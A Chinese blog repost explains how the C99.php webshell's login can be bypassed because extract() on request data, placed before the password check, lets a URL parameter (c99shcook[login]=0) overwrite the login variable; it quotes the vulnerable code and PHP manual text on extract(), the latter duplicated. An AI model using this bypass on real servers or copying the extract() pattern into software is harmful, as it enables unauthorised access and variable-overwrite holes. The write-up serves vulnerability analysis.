C99.PHP webshell 绕过登陆密码漏洞（extract函数导致变量覆盖漏洞）

From: Every C99.php Shell Is Backdoored (A.K.A. Free Shells for Everyone!)

C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。

http://127.0.0.1/c99.php?c99shcook[login]=0

可直接登陆。

漏洞原因是，错误的使用了extract()导致变量覆盖漏洞，即下面代码：

@extract($_REQUEST["c99shcook"]);

正好在验证登陆语句的前面，而验证登陆的代码为：

if ($login) {
    if (empty($md5_pass)) {
        $md5_pass = md5($pass);
    }
    if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
         if ($login_txt === false) {
            $login_txt = "";
        } elseif (empty($login_txt)) {
            $login_txt = strip_tags(ereg_replace("&amp;nbsp;|&lt;br&gt;", " ", $donated_html));
         }
        header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");
         header("HTTP/1.0 401 Unauthorized");
        exit($accessdeniedmess);
    }
}

转自：http://lcx.cc/?i=4381 和http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/。

ps:在php中extract() 函数从数组中把变量导入到当前的符号表中。对于数组中的每个元素，键名用于变量名，键值用于变量值。

语法

extract(array,extract_rules,prefix)

参数	描述
array	必需。规定要使用的输入。
extract_rules	可选。extract() 函数将检查每个键名是否为合法的变量名，同时也检查和符号表中的变量名是否冲突。对非法、数字和冲突的键名的处理将根据此参数决定。可以是以下值之一：可能的值： EXTR_OVERWRITE – 默认。如果有冲突，则覆盖已有的变量。 EXTR_SKIP – 如果有冲突，不覆盖已有的变量。（忽略数组中同名的元素） EXTR_PREFIX_SAME – 如果有冲突，在变量名前加上前缀 prefix。自 PHP 4.0.5 起，这也包括了对数字索引的处理。 EXTR_PREFIX_ALL – 给所有变量名加上前缀 prefix（第三个参数）。 EXTR_PREFIX_INVALID – 仅在非法或数字变量名前加上前缀 prefix。本标记是 PHP 4.0.5 新加的。 EXTR_IF_EXISTS – 仅在当前符号表中已有同名变量时，覆盖它们的值。其它的都不处理。可以用在已经定义了一组合法的变量，然后要从一个数组例如 $_REQUEST 中提取值覆盖这些变量的场合。本标记是 PHP 4.2.0 新加的。 EXTR_PREFIX_IF_EXISTS – 仅在当前符号表中已有同名变量时，建立附加了前缀的变量名，其它的都不处理。本标记是 PHP 4.2.0 新加的。 EXTR_REFS – 将变量作为引用提取。这有力地表明了导入的变量仍然引用了 var_array 参数的值。可以单独使用这个标志或者在 extract_type 中用 OR 与其它任何标志结合使用。本标记是 PHP 4.3.0 新加的。
prefix	可选。请注意 prefix 仅在 extract_type 的值是 EXTR_PREFIX_SAME，EXTR_PREFIX_ALL，EXTR_PREFIX_INVALID 或 EXTR_PREFIX_IF_EXISTS 时需要。如果附加了前缀后的结果不是合法的变量名，将不会导入到符号表中。前缀和数组键名之间会自动加上一个下划线。

参数

描述

array

必需。规定要使用的输入。

extract_rules

可选。extract() 函数将检查每个键名是否为合法的变量名，同时也检查和符号表中的变量名是否冲突。

对非法、数字和冲突的键名的处理将根据此参数决定。可以是以下值之一：

可能的值：

EXTR_OVERWRITE – 默认。如果有冲突，则覆盖已有的变量。
EXTR_SKIP – 如果有冲突，不覆盖已有的变量。（忽略数组中同名的元素）
EXTR_PREFIX_SAME – 如果有冲突，在变量名前加上前缀 prefix。自 PHP 4.0.5 起，这也包括了对数字索引的处理。
EXTR_PREFIX_ALL – 给所有变量名加上前缀 prefix（第三个参数）。
EXTR_PREFIX_INVALID – 仅在非法或数字变量名前加上前缀 prefix。本标记是 PHP 4.0.5 新加的。
EXTR_IF_EXISTS – 仅在当前符号表中已有同名变量时，覆盖它们的值。其它的都不处理。可以用在已经定义了一组合法的变量，然后要从一个数组例如 $_REQUEST 中提取值覆盖这些变量的场合。本标记是 PHP 4.2.0 新加的。
EXTR_PREFIX_IF_EXISTS – 仅在当前符号表中已有同名变量时，建立附加了前缀的变量名，其它的都不处理。本标记是 PHP 4.2.0 新加的。
EXTR_REFS – 将变量作为引用提取。这有力地表明了导入的变量仍然引用了 var_array 参数的值。可以单独使用这个标志或者在 extract_type 中用 OR 与其它任何标志结合使用。本标记是 PHP 4.3.0 新加的。

prefix

可选。请注意 prefix 仅在 extract_type 的值是 EXTR_PREFIX_SAME，EXTR_PREFIX_ALL，EXTR_PREFIX_INVALID 或 EXTR_PREFIX_IF_EXISTS 时需要。如果附加了前缀后的结果不是合法的变量名，将不会导入到符号表中。

前缀和数组键名之间会自动加上一个下划线。

本函数返回成功设置的变量数目。

转载请注明：jinglingshu的博客 » C99.PHP webshell 绕过登陆密码漏洞（extract函数导致变量覆盖漏洞）

C99.PHP webshell 绕过登陆密码漏洞（extract函数导致变量覆盖漏洞）

语法

与本文相关的文章

Hi，您需要填写昵称和邮箱！